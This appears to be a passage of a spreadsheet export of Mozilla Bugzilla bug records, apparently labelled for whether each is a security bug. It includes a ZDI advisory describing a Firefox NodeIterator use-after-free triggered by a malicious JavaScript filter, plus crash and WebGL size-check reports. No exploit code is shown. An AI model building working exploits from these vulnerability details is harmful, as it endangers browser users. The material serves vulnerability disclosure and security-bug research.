          <t>---</t>
        </is>
      </c>
      <c r="T1466" t="n">
        <v>1</v>
      </c>
      <c r="U1466" t="n">
        <v>0</v>
      </c>
      <c r="V1466" t="n">
        <v>28</v>
      </c>
      <c r="W1466" t="inlineStr">
        <is>
          <t>Created attachment 432254
Proof of concept
ZDI-CAN-712: Mozilla Firefox NodeIterator Remote Code Execution Vulnerability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victim must visit a malicious page or open a malicious file.
The specific flaw exists within the application's implementation of the NodeIterator interface for traversal of the Document Object Model. Due to the implementation requiring a javascript callback, an attacker can utilize the callback in order to manipulate the contents of the page. By doing so in an unexpected manner, an attacker can cause the process to corrupt memory. Successful exploitation will lead to code execution under the context of the application.
The particular issue is located within Mozilla Firefox's implemenation of Document Traversal and involves both the NodeFilter and NodeIterator interfaces. The NodeIterator interface allows one to specify a NodeFilter in order to allow a finer granularity of control over which nodes will be traversed.
A NodeIterator's interface as specified at (http://www.w3.org/TR/DOM-Level-2-Traversal-Range/traversal.html#Traversal-NodeIterator) is defined as:
// Introduced in DOM Level 2:
interface NodeIterator {
  readonly attribute Node             root;
  readonly attribute unsigned long    whatToShow;
  readonly attribute NodeFilter       filter;
  readonly attribute boolean          expandEntityReferences;
  Node               nextNode()
                                        raises(DOMException);
  Node               previousNode()
                                        raises(DOMException);
  void               detach();
};
This interface contains two methods which are used to trigger this vulnerability. The first one is the 'filter' property. This is a readonly attribute that's set on creation of a NodeIterator. The next one is detach() which will detach a node from the tree. The implementation of this primarily resides within content/base/src/nsNodeIterator.cpp.
Creation of a NodeIterator first starts within the following snippet.
One of the parameters is the specified filter.
content/base/src/nsDocument.cpp:4767
NS_IMETHODIMP
nsDocument::CreateNodeIterator(nsIDOMNode *aRoot,
                               PRUint32 aWhatToShow,
                               nsIDOMNodeFilter *aFilter,     // XXX
                               PRBool aEntityReferenceExpansion,
                               nsIDOMNodeIterator **_retval)
{
  *_retval = nsnull;
  if (!aRoot)
    return NS_ERROR_DOM_NOT_SUPPORTED_ERR;
  nsresult rv = nsContentUtils::CheckSameOrigin(this, aRoot);
  NS_ENSURE_SUCCESS(rv, rv);
  NS_ENSURE_ARG_POINTER(_retval);
  nsCOMPtr&lt;nsINode&gt; root = do_QueryInterface(aRoot);
  NS_ENSURE_TRUE(root, NS_ERROR_DOM_NOT_SUPPORTED_ERR);
  nsNodeIterator *iterator = new nsNodeIterator(root,
                                                aWhatToShow,
                                                aFilter,  // XXX
aEntityReferenceExpansion);
This will then instantiated a new NodeIterator which will then create an nsTraversal object which will utilize the specified filter and store it as one of it's properties.
content/base/src/nsNodeIterator.cpp:183
nsNodeIterator::nsNodeIterator(nsINode *aRoot,
                               PRUint32 aWhatToShow,
                               nsIDOMNodeFilter *aFilter,
                               PRBool aExpandEntityReferences) :
    nsTraversal(aRoot, aWhatToShow, aFilter, aExpandEntityReferences), 
// XXX
    mDetached(PR_FALSE),
    mPointer(mRoot, PR_TRUE)
{
    aRoot-&gt;AddMutationObserver(this);
}
Iteration of a NodeIterator is then performed via the nextNode() and prevNode() methods. The implementation of the nextNode() method is located in the following file. If there is a filter, this code will ask the filter function if the node is valid, and if so will return it. To accomplish this, the application will use the TestNode method.
content/base/src/nsNodeIterator.cpp:264
/* nsIDOMNode nextNode ()  raises (DOMException); */
NS_IMETHODIMP nsNodeIterator::NextNode(nsIDOMNode **_retval)
{
    nsresult rv;
    PRInt16 filtered;
    *_retval = nsnull;
    if (mDetached)
        return NS_ERROR_DOM_INVALID_STATE_ERR;
    mWorkingPointer = mPointer;
    while (mWorkingPointer.MoveToNext(mRoot)) {
        nsCOMPtr&lt;nsINode&gt; testNode = mWorkingPointer.mNode;
        rv = TestNode(testNode, &amp;filtered);       // XXX
        NS_ENSURE_SUCCESS(rv, rv);
        if (filtered == nsIDOMNodeFilter::FILTER_ACCEPT) {
            mPointer = mWorkingPointer;
            mWorkingPointer.Clear();
            return CallQueryInterface(testNode, _retval);
        }
    }
    mWorkingPointer.Clear();
    return NS_OK;
}
nsTraversal::TestNode will then call the filtering function and return the filtervalue of the particular node that the iterator currently has. This will then call the AcceptNode method of the NodeFilter interface.
content/base/src/nsTraversal.cpp:67
/*
 * Tests if and how a node should be filtered. Uses mWhatToShow and
 * mFilter to test the node.
 * @param aNode     Node to test
 * @param _filtered Returned filtervalue. See nsIDOMNodeFilter.idl
 * @returns         Errorcode
 */
nsresult nsTraversal::TestNode(nsINode* aNode, PRInt16* _filtered)
{
    nsresult rv;
    *_filtered = nsIDOMNodeFilter::FILTER_SKIP;
    PRUint16 nodeType = 0;
    // Check the most common cases
    if (aNode-&gt;IsNodeOfType(nsINode::eELEMENT)) {
        nodeType = nsIDOMNode::ELEMENT_NODE;
    }
    else if (aNode-&gt;IsNodeOfType(nsINode::eCONTENT)) {
        nsIAtom* tag = static_cast&lt;nsIContent*&gt;(aNode)-&gt;Tag();
        if (tag == nsGkAtoms::textTagName) {
            nodeType = nsIDOMNode::TEXT_NODE;
        }
        else if (tag == nsGkAtoms::cdataTagName) {
            nodeType = nsIDOMNode::CDATA_SECTION_NODE;
        }
        else if (tag == nsGkAtoms::commentTagName) {
            nodeType = nsIDOMNode::COMMENT_NODE;
        }
        else if (tag == nsGkAtoms::processingInstructionTagName) {
            nodeType = nsIDOMNode::PROCESSING_INSTRUCTION_NODE;
        }
    }
    nsCOMPtr&lt;nsIDOMNode&gt; domNode;
    if (!nodeType) {
        domNode = do_QueryInterface(aNode);
        rv = domNode-&gt;GetNodeType(&amp;nodeType);
        NS_ENSURE_SUCCESS(rv, rv);
    }
    if (nodeType &lt;= 12 &amp;&amp; !((1 &lt;&lt; (nodeType-1)) &amp; mWhatToShow)) {
        return NS_OK;
    }
    if (mFilter) {          // XXX
        if (!domNode) {
            domNode = do_QueryInterface(aNode);
        }
        return mFilter-&gt;AcceptNode(domNode, _filtered);    // XXX
    }
    *_filtered = nsIDOMNodeFilter::FILTER_ACCEPT;
    return NS_OK;
}
A NodeFilter interface is located at (http://www.w3.org/TR/DOM-Level-2-Traversal-Range/traversal.html#Traversal-NodeFilter) and can be defined as.
interface NodeFilter {
  // Constants returned by acceptNode
  const short               FILTER_ACCEPT                  = 1;
  const short               FILTER_REJECT                  = 2;
  const short               FILTER_SKIP                    = 3;
  // Constants for whatToShow
  const unsigned long       SHOW_ALL                       =
0xFFFFFFFF;
  const unsigned long       SHOW_ELEMENT                   =
0x00000001;
  const unsigned long       SHOW_ATTRIBUTE                 =
0x00000002;
  const unsigned long       SHOW_TEXT                      =
0x00000004;
  const unsigned long       SHOW_CDATA_SECTION             =
0x00000008;
  const unsigned long       SHOW_ENTITY_REFERENCE          =
0x00000010;
  const unsigned long       SHOW_ENTITY                    =
0x00000020;
  const unsigned long       SHOW_PROCESSING_INSTRUCTION    =
0x00000040;
  const unsigned long       SHOW_COMMENT                   =
0x00000080;
  const unsigned long       SHOW_DOCUMENT                  =
0x00000100;
  const unsigned long       SHOW_DOCUMENT_TYPE             =
0x00000200;
  const unsigned long       SHOW_DOCUMENT_FRAGMENT         =
0x00000400;
  const unsigned long       SHOW_NOTATION                  =
0x00000800;
  short              acceptNode(in Node n);
};
If a malicious javascript filter that removes the elements the NodeIterator is iterating over, the application will access memory that's freed while the node is being iterated.
Version(s)  tested: Mozilla Firefox 3.6
Platform(s) tested: Windows XP SP3
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X1466" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1467">
      <c r="A1467" t="n">
        <v>827870</v>
      </c>
      <c r="B1467" t="inlineStr">
        <is>
          <t>2013-01-08 08:38:46 -0800</t>
        </is>
      </c>
      <c r="C1467" t="inlineStr">
        <is>
          <t>Assertion when setting expando on a document xray</t>
        </is>
      </c>
      <c r="D1467" t="inlineStr">
        <is>
          <t>2013-11-25 13:27:18 -0800</t>
        </is>
      </c>
      <c r="E1467" t="n">
        <v>1</v>
      </c>
      <c r="F1467" t="n">
        <v>1</v>
      </c>
      <c r="G1467" t="n">
        <v>3</v>
      </c>
      <c r="H1467" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1467" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1467" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K1467" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1467" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1467" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1467" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1467" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1467" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q1467" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1467" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1467" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1467" t="n">
        <v>1</v>
      </c>
      <c r="U1467" t="n">
        <v>0</v>
      </c>
      <c r="V1467" t="n">
        <v>18</v>
      </c>
      <c r="W1467" t="inlineStr">
        <is>
          <t>If I run the js/xpconnect/tests/chrome/test_bug738244.xul test, I get an assertion:
#0  NS_DebugBreak_P (aSeverity=1, aStr=0x105e58c00 "trying to wrap a holder", aExpr=0x105e58c18 "JS_GetClass(obj) != &amp;XrayUtils::HolderClass", aFile=0x105e58aa4 "../../../../mozilla/js/xpconnect/wrappers/WrapperFactory.cpp", aLine=328) at nsDebugImpl.cpp:285
#1  0x00000001041623b9 in xpc::WrapperFactory::Rewrap (cx=0x11597ef50, existing=0x0, obj=0x128249280, wrappedProto=0x1, parent=0x10f141060, flags=0) at WrapperFactory.cpp:328
#2  0x00000001010b0373 in JSCompartment::wrap (this=0x12658e000, cx=0x11597ef50, vp=0x7fff5fbf72b8, existing=0x0) at jscompartment.cpp:401
#3  0x00000001010b08fe in JSCompartment::wrap (this=0x12658e000, cx=0x11597ef50, objp=0x7fff5fbf7388, existing=0x0) at jscompartment.cpp:443
#4  0x00000001010b0db1 in JSCompartment::wrap (this=0x12658e000, cx=0x11597ef50, desc=0x7fff5fbf7388) at jscompartment.cpp:483
#5  0x00000001010ec125 in JS_WrapPropertyDescriptor (cx=0x11597ef50, desc=0x7fff5fbf7388) at jsfriendapi.cpp:247
#6  0x0000000104157a3a in xpc::XrayWrapper&lt;js::CrossCompartmentWrapper, xpc::XPCWrappedNativeXrayTraits&gt;::defineProperty (this=0x1071b97f0, cx=0x11597ef50, wrapper=0x10fc02180, id={asBits = 4554045312}, desc=0x7fff5fbf76c0) at XrayWrapper.cpp:1489
#7  0x00000001011fa5e1 in js::BaseProxyHandler::set (this=0x1071b97f0, cx=0x11597ef50, proxy_=0x10fc02180, receiver_=0x10fc02180, id_={asBits = 4554045312}, strict=false, vp=0x7fff5fbf7c68) at jsproxy.cpp:203
#8  0x0000000104158014 in xpc::XrayWrapper&lt;js::CrossCompartmentWrapper, xpc::XPCWrappedNativeXrayTraits&gt;::set (this=0x1071b97f0, cx=0x11597ef50, wrapper=0x10fc02180, receiver=0x10fc02180, id={asBits = 4554045312}, strict=false, vp=0x7fff5fbf7c68) at XrayWrapper.cpp:1598
from this line of the test:
        doc.getElementById = 42;
Not sure whether this is a regression or not, but it doesn't look good.  Too bad mochitests don't fail on asserts.  :(
Bobby, do you know what's going on here?</t>
        </is>
      </c>
      <c r="X1467" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1468">
      <c r="A1468" t="n">
        <v>470123</v>
      </c>
      <c r="B1468" t="inlineStr">
        <is>
          <t>2008-12-17 15:35:37 -0800</t>
        </is>
      </c>
      <c r="C1468" t="inlineStr">
        <is>
          <t>[qmo2][Discoverability] Add a logout link to the head bar beneath "My Accout" or "Create"</t>
        </is>
      </c>
      <c r="D1468" t="inlineStr">
        <is>
          <t>2009-06-21 11:17:28 -0700</t>
        </is>
      </c>
      <c r="E1468" t="n">
        <v>1</v>
      </c>
      <c r="F1468" t="n">
        <v>1</v>
      </c>
      <c r="G1468" t="n">
        <v>5</v>
      </c>
      <c r="H1468" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1468" t="inlineStr">
        <is>
          <t>quality.mozilla.org</t>
        </is>
      </c>
      <c r="J1468" t="inlineStr">
        <is>
          <t>Website</t>
        </is>
      </c>
      <c r="K1468" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1468" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1468" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1468" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1468" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1468" t="inlineStr"/>
      <c r="Q1468" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1468" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1468" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1468" t="n">
        <v>1</v>
      </c>
      <c r="U1468" t="n">
        <v>0</v>
      </c>
      <c r="V1468" t="n">
        <v>28</v>
      </c>
      <c r="W1468" t="inlineStr">
        <is>
          <t>With the current situation it will be hard for new users to find the logout button. No-one will expect to see it in the left column a long way down. We should also place a link into the head bar which gives easy access to the logout function. It could be in-front of "My Account" or behind "Create".
At least, why we need the "Create" link for logged-in users? We could replace it with "Logout".</t>
        </is>
      </c>
      <c r="X1468" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1469">
      <c r="A1469" t="n">
        <v>1532525</v>
      </c>
      <c r="B1469" t="inlineStr">
        <is>
          <t>2019-03-04 22:33:39 -0800</t>
        </is>
      </c>
      <c r="C1469" t="inlineStr">
        <is>
          <t>could be trigger oom problem with  WebGLBuffer::BufferData</t>
        </is>
      </c>
      <c r="D1469" t="inlineStr">
        <is>
          <t>2024-05-30 09:57:11 -0700</t>
        </is>
      </c>
      <c r="E1469" t="n">
        <v>1</v>
      </c>
      <c r="F1469" t="n">
        <v>1</v>
      </c>
      <c r="G1469" t="n">
        <v>3</v>
      </c>
      <c r="H1469" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1469" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1469" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K1469" t="inlineStr">
        <is>
          <t>67 Branch</t>
        </is>
      </c>
      <c r="L1469" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1469" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1469" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1469" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1469" t="inlineStr">
        <is>
          <t>[adv-main67+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q1469" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1469" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1469" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T1469" t="n">
        <v>1</v>
      </c>
      <c r="U1469" t="n">
        <v>0</v>
      </c>
      <c r="V1469" t="n">
        <v>42</v>
      </c>
      <c r="W1469" t="inlineStr">
        <is>
          <t>Created attachment 9048397
1.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Steps to reproduce:
void WebGLBuffer::BufferData(GLenum target, size_t size, const void* data,
                             GLenum usage) {
  // Careful: data.Length() could conceivably be any uint32_t, but GLsizeiptr
  // is like intptr_t.
  if (!CheckedInt&lt;GLsizeiptr&gt;(size).isValid())
    return mContext-&gt;ErrorOutOfMemory("bad size");
  if (!ValidateBufferUsageEnum(mContext, usage)) return;
#ifdef XP_MACOSX
  // bug 790879
  if (mContext-&gt;gl-&gt;WorkAroundDriverBugs() &amp;&amp; size &gt; INT32_MAX) {
    mContext-&gt;ErrorOutOfMemory("Allocation size too large.");
    return;
  }
#endif
  const void* uploadData = data;
  UniqueBuffer newIndexCache;
  if (target == LOCAL_GL_ELEMENT_ARRAY_BUFFER &amp;&amp;
      mContext-&gt;mNeedsIndexValidation) {
    newIndexCache = malloc(size);
    if (!newIndexCache) {
      mContext-&gt;ErrorOutOfMemory("Failed to alloc index cache.");
      return;
    }
    memcpy(newIndexCache.get(), data, size);
    uploadData = newIndexCache.get();
  }
The bufferdata function does not have an appropriate check for size value.
This coulde cause problems in the attached code.
I think it's almost impossible to exploit, but I think it's a security issue. :)</t>
        </is>
      </c>
      <c r="X1469" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1470">
      <c r="A1470" t="n">
        <v>1578679</v>
      </c>
      <c r="B1470" t="inlineStr">
        <is>
          <t>2019-09-04 03:22:33 -0700</t>
        </is>
      </c>
      <c r="C1470" t="inlineStr">
        <is>
          <t>.eslintrc.js references xml files that are no longer present</t>
        </is>
      </c>
      <c r="D1470" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E1470" t="n">
        <v>1</v>
      </c>
      <c r="F1470" t="n">
        <v>1</v>
      </c>
      <c r="G1470" t="n">
        <v>7</v>
      </c>
      <c r="H1470" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1470" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J1470" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K1470" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1470" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1470" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1470" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1470" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1470" t="inlineStr"/>
      <c r="Q1470" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1470" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1470" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T1470" t="n">
        <v>1</v>
      </c>
      <c r="U1470" t="n">
        <v>0</v>
      </c>
      <c r="V1470" t="n">
        <v>4</v>
      </c>
      <c r="W1470" t="inlineStr">
        <is>
          <t>I just noticed the top-level .eslintrc.js file is referencing xml files that have now been removed, unfortunately no-one cleaned them up when they were removed.
Time to drop them.</t>
        </is>
      </c>
      <c r="X1470" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1471">
      <c r="A1471" t="n">
        <v>793984</v>
      </c>
      <c r="B1471" t="inlineStr">
        <is>
          <t>2012-09-25 01:02:54 -0700</t>
        </is>
      </c>
      <c r="C1471" t="inlineStr">
        <is>
          <t>Self-serve giving "502 Bad Gateway" errors</t>
        </is>
      </c>
      <c r="D1471" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1471" t="n">
        <v>1</v>
      </c>
      <c r="F1471" t="n">
        <v>1</v>
      </c>
      <c r="G1471" t="n">
        <v>5</v>
      </c>
      <c r="H1471" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1471" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1471" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1471" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1471" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1471" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1471" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1471" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1471" t="inlineStr">
        <is>
          <t>[buildduty]</t>
        </is>
      </c>
      <c r="Q1471" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1471" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1471" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1471" t="n">
        <v>1</v>
      </c>
      <c r="U1471" t="n">
        <v>0</v>
      </c>
      <c r="V1471" t="n">
        <v>3</v>
      </c>
      <c r="W1471" t="inlineStr">
        <is>
          <t>eg:
https://secure.pub.build.mozilla.org/buildapi/self-serve/mozilla-central/rev/08d435dedc7f
{
502 Bad Gateway
}
First noticed at 0855 UTC+1</t>
        </is>
      </c>
      <c r="X1471" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1472">
      <c r="A1472" t="n">
        <v>1248977</v>
      </c>
      <c r="B1472" t="inlineStr">
        <is>
          <t>2016-02-17 06:51:39 -0800</t>
        </is>
      </c>
      <c r="C1472" t="inlineStr">
        <is>
          <t>Prompt user to login if a feature needs it</t>
        </is>
      </c>
      <c r="D1472" t="inlineStr">
        <is>
          <t>2019-02-08 13:22:38 -0800</t>
        </is>
      </c>
      <c r="E1472" t="n">
        <v>1</v>
      </c>
      <c r="F1472" t="n">
        <v>1</v>
      </c>
      <c r="G1472" t="n">
        <v>5</v>
      </c>
      <c r="H1472" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1472" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J1472" t="inlineStr">
        <is>
          <t>UI</t>
        </is>
      </c>
      <c r="K1472" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1472" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1472" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1472" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1472" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1472" t="inlineStr">
        <is>
          <t>[triaged]</t>
        </is>
      </c>
      <c r="Q1472" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1472" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1472" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1472" t="n">
        <v>1</v>
      </c>
      <c r="U1472" t="n">
        <v>0</v>
      </c>
      <c r="V1472" t="n">
        <v>10</v>
      </c>
      <c r="W1472" t="inlineStr">
        <is>
          <t>I was trying this job [1]
This is a blocker for developers to use this button.
[1] https://treeherder.mozilla.org/#/jobs?repo=try&amp;revision=5d196bbe596b&amp;selectedJob=16780073
403:  You do not have sufficient scopes. This request requires you to have one of the following sets of scopes: [ [ "queue:create-task:aws-provisioner-v1/desktop-test" ], [ "queue:define-task:aws-provisioner-v1/desktop-test", "queue:task-group-id:task-graph-scheduler/AfLVXbR5SRiVvQ0p-_0cSA", "queue:schedule-task:task-graph-scheduler/AfLVXbR5SRiVvQ0p-_0cSA/dCiaXOJsTBuRgHpakwX9dw" ] ] You only have the scopes: [] In other words you are missing scopes from one of the options: * Option 0: - "queue:create-task:aws-provisioner-v1/desktop-test" * Option 1: - "queue:define-task:aws-provisioner-v1/desktop-test", and - "queue:task-group-id:task-graph-scheduler/AfLVXbR5SRiVvQ0p-_0cSA", and - "queue:schedule-task:task-graph-scheduler/AfLVXbR5SRiVvQ0p-_0cSA/dCiaXOJsTBuRgHpakwX9dw" ---- errorCode: InsufficientScopes statusCode: 403 requestInfo: method: createTask params: {"taskId":"dCiaXOJsTBuRgHpakwX9dw"} payload: { "provisionerId": "aws-provisioner-v1", "workerType": "desktop-test", "schedulerId": "task-graph-scheduler", "taskGroupId": "AfLVXbR5SRiVvQ0p-_0cSA", "priority": "normal", "retries": 0, "created": "2016-02-17T14:48:39.102Z", "deadline": "2016-02-18T02:48:39.101Z", "expires": "2016-02-24T14:48:39.102Z", "scopes": [ "docker-worker:feature:allowPtrace", "docker-worker:cache:level-1-try-test-workspace", "docker-worker:capability:device:loopbackVideo", "docker-worker:capability:device:loopbackAudio" ], "payload": { "artifacts": { "public/logs/": { "expires": "2017-02-15T16:41:17.925Z", "path": "/home/worker/workspace/build/upload/logs/", "type": "directory" }, "public/test": { "expires": "2017-02-15T16:41:17.917Z", "path": "/home/worker/artifacts/", "type": "directory" }, "public/test_info/": { "expires": "2017-02-15T16:41:17.925Z", "path": "/home/worker/workspace/build/blobber_upload_dir/", "type": "directory" } }, "cache": { "level-1-try-test-workspace": "/home/worker/workspace" }, "capabilities": { "devices": { "loopbackAudio": true, "loopbackVideo": true } }, "command": [ "bash", "/home/worker/bin/test.sh", "--no-read-buildbot-config", "--installer-url=https://queue.taskcluster.net/v1/task/TiCX8D4DRjW-rdn44XGaVw/artifacts/public/build/target.tar.bz2", "--test-packages-url=https://queue.taskcluster.net/v1/task/TiCX8D4DRjW-rdn44XGaVw/artifacts/public/build/test_packages.json", "--download-symbols=ondemand", "--mochitest-suite=browser-chrome-chunked", "--total-chunk=7", "--this-chunk=5", "--e10s" ], "env": { "GECKO_HEAD_REPOSITORY": "https://hg.mozilla.org/try/", "GECKO_HEAD_REV": "5d196bbe596b1e4d0dbfbc7173d859a8603e225a", "MOZHARNESS_CONFIG": "mozharness/configs/unittests/linux_unittest.py mozharness/configs/remove_executables.py\n", "MOZHARNESS_SCRIPT": "mozharness/scripts/desktop_unittest.py", "MOZHARNESS_URL": "https://queue.taskcluster.net/v1/task/TiCX8D4DRjW-rdn44XGaVw/artifacts/public/build/mozharness.zip", "MOZILLA_BUILD_URL": "https://queue.taskcluster.net/v1/task/TiCX8D4DRjW-rdn44XGaVw/artifacts/public/build/target.tar.bz2", "NEED_PULSEAUDIO": true, "NEED_WINDOW_MANAGER": true, "TASKCLUSTER_INTERACTIVE": "true" }, "features": { "allowPtrace": true, "interactive": true }, "image": { "path": "public/image.tar", "taskId": "GFjTG6RuQBmF9_llHWp2hQ", "type": "task-image" }, "maxRunTime": 3600 }, "metadata": { "description": "Mochitest browser-chrome e10s run 5", "name": "[TC] Linux64 mochitest-browser-chrome-e10s-5", "owner": "mozilla-taskcluster-maintenance@mozilla.com", "source": "https://hg.mozilla.org/try/file/5d196bbe596b1e4d0dbfbc7173d859a8603e225a/testing/taskcluster/tasks/builds/dbg_linux64_clobber.yml" }, "tags": { "createdForUser": "armenzg@mozilla.com" }, "extra": { "chunks": { "current": 5, "total": 7 }, "suite": { "flavor": "browser-chrome-chunked", "name": "mochitest" }, "treeherder": { "build": { "platform": "linux64" }, "collection": { "debug": true }, "groupName": "Desktop mochitests", "groupSymbol": "tc-M-e10s", "machine": { "platform": "linux64" }, "symbol": "bc5", "tier": 2 }, "treeherderEnv": [ "production", "staging" ] }, "routes": [] } time: 2016-02-17T14:48:37.746Z details: { "scopesets": [ [ "queue:create-task:aws-provisioner-v1/desktop-test" ], [ "queue:define-task:aws-provisioner-v1/desktop-test", "queue:task-group-id:task-graph-scheduler/AfLVXbR5SRiVvQ0p-_0cSA", "queue:schedule-task:task-graph-scheduler/AfLVXbR5SRiVvQ0p-_0cSA/dCiaXOJsTBuRgHpakwX9dw" ] ], "scopes": [] }</t>
        </is>
      </c>
      <c r="X1472" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1473">
      <c r="A1473" t="n">
        <v>490741</v>
      </c>
      <c r="B1473" t="inlineStr">
        <is>
          <t>2009-04-29 18:38:23 -0700</t>
        </is>
      </c>
      <c r="C1473" t="inlineStr">
        <is>
          <t>Crash [@ js_GetUpvar] on datepick</t>
        </is>
      </c>
      <c r="D1473" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E1473" t="n">
        <v>1</v>
      </c>
      <c r="F1473" t="n">
        <v>1</v>
      </c>
      <c r="G1473" t="n">
        <v>3</v>
      </c>
      <c r="H1473" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1473" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1473" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1473" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1473" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1473" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1473" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1473" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1473" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q1473" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1473" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1473" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T1473" t="n">
        <v>1</v>
      </c>
